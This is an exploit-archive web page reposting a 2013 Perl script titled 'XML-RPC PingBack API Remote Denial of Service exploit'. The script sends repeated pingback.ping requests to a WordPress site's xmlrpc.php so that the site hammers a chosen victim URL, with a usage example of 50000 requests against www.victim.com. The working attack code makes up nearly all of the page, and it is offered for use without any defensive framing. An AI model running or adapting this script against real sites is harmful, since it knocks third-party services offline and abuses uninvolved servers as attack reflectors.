首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
XML-RPC PingBack API Remote DoS Exploit (through xmlrpc.php)
来源:1337day.com 作者:D35m0nd142 发布时间:2013-01-09   
#Exploit Title: XML-RPC PingBack API Remote Denial of Service exploit (through xmlrpc.php)
#Date: 04/01/2013
#Category: Remote
#Exploit Author: D35m0nd142
#Tested on: (Debian) Linux
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request::Common;
use IO::Socket::INET;
system("clear");
print "***************************************************************************************\n";
print "*               XML-RPC PingBack API Remote Denial of Service exploit                 *\n";
print "*      Usage: ./exploit.pl <xml_website> <target> <requests count> <real_article>     *\n";
print "*   Example: ./exploit.pl www.myblog.com www.victim.com 50000 /blog/virus-protection/ *\n";
print "*                             Created by D35m0nd142                                   *\n";
print "***************************************************************************************\n\n";
my $target = $ARGV[1] ;
my $xml_site = $ARGV[0];
my $article = $ARGV[3];
my $count = $ARGV[2];
if($count eq '' || $article eq '' || $xml_site eq '' || $target eq '')
{
print "\n[!] Usage: ./exploit.pl <xml_website> <target> <requests count> <real article>\n\n";
exit(1);
}

if($target !~ /http:\/\//)
{
$target = "http://$target";
}
if($xml_site !~ /http:\/\//)
{
$xml_site = "http://$xml_site";
}

$full = $target.$article;
sleep 1;

$text = "<?xml version='1.0' encoding='iso-8859-1'?><methodCall><methodName>pingback.ping</methodName><params><param><value><string>$target</string></value></param><param><value><string>$full</string></value></param></params></methodCall>";
$request_length= length $text;

print "Sending POST requests . . \n";

$filename = "pingback.txt";
open(FILE , "> $filename");
for($i=1;$i<=$count;$i++)
{
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0] , PeerPort => 'http(80)', Proto => 'tcp'); #You can change 'PeerPort' if you need
$request = "POST /xmlrpc.php HTTP/1.1\r\nHost: $ARGV[0]\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $request_length\r\n\n<?xml version=\"1.0\" encoding=\"iso-8859-1\"?><methodCall><methodName>pingback.ping</methodName><params><param><value><string>$ARGV[1]</string></value></param><param><value><string>$ARGV[0]$ARGV[3]</string></value></param></params></methodCall>\r\n\r\n";
sleep 1;
print $request;
print $sock $request;
while(<$sock>)
{
print FILE;
}

}
#system("rm pingback.txt"); //If you want to save all connections made in pingback.txt file, remove '#' .

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Ettercap <= 0.7.5.1 Stack Over
·WordPress Google Document Embe
·Foxit Reader <= 5.4.4.1128 Fir
·IBM Cognos tm1admsd.exe Overfl
·FoxPlayer v2.9.0 Denial of Ser
·Enterasys NetSight nssyslogd.e
·Inmatrix Ltd. Zoom Player 8.5
·Ratbox IRCd Denial Of Service
·Colloquy 1.3.5 / 1.3.6 Denial
·WordPress Plugin Advanced Cust
·Samsung Kies 2.5.0.12114_1 Buf
·Allied Telesis AT-MCF2000M 3.0
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved